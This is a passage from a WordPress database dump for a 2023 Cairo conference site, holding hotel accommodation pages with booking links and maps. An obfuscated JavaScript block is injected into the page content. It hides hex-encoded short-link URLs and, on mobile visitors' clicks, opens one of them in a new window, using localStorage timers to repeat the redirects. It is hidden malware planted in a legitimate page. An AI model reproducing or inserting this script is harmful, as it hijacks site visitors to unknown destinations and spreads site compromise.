\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 22:09:26','2023-07-18 22:09:26','',2685,'https://gsw2023.com/?p=5013',0,'revision','',0),
(5014,1,'2023-07-18 22:11:29','2023-07-18 22:11:29','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 